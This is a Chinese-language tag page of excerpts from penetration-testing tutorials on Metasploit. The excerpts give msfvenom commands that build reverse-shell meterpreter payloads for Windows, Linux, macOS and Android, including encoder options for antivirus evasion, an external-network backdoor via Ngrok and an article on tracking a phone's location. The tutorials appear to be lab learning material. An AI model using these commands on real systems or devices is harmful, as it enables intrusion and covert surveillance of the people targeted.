首页 > TAG信息列表 > LPORT
Xml外部实体注入漏洞
Xml外部实体注入漏洞(XXE) Xml介绍 XML 不是 HTML 的替代。 XML 和 HTML 为不同的目的而设计: XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 XML文档结构包括:XML文档声明,DTDmetasploit之基础命令操作
文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内metasploit
metasploit 木马生成与监听 msfvenom -p windows/meterpreter/reverse_tcp -lhost=192.168.1.1 lport=4444 -f exe -o /tmp/shell.exe //生成windows下的木马文件 use exploit/multi/handler //所有类型木马监听都用handler模块 set lhost 192.168.1.1. set port 4444 run渗透测试(二)-Metasploit生成免杀后门(外网篇)
1. Sunny-Ngrok 开通隧道 首先在官网注册会员 登陆 选择要开通的服务器 这里我们选择美国Ngrok免费服务器 选择tcp协议,填一个可以使用的端口号。 开通隧道后可以在 隧道管理 中看到自己的隧道信息: 记住这里的 隧道id,赠送域名 以及 隧道端口,下面会用msfvenom生成不同类型shell
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to C网络安全之KALI渗透手机、获取目标的精确位置
合理学习技术,切勿犯罪 1.先查看本机kali的IP地址,使用命令ifocnfig 2:在终端输入msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 来生成木马程序 提示这就是成功了! 然后输入命令:msfconsole来启动监听,启动时间有点长稍微等一Metasploit和Metepreter的基础命令
0X01 - 初始化msf数据库 输入msfc(tab补全),进入msf窗口 (1)启动postgresql数据库 1 [root@kali ~]# service postgresql start (2)对msf进行数据库初始化 1 [root@kali ~]# msfdb init (3)输入msfconsole进行msf界面 (4)在msf界面输入db_status查看msf与postgresql数据库的连接状态msfvenom 常用生成 payload 命令
windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayload.exe mac: msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPmsf下的各种生成payload命令
msf下的各种生成payload命令 List payloads msfvenom -l Binaries: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHO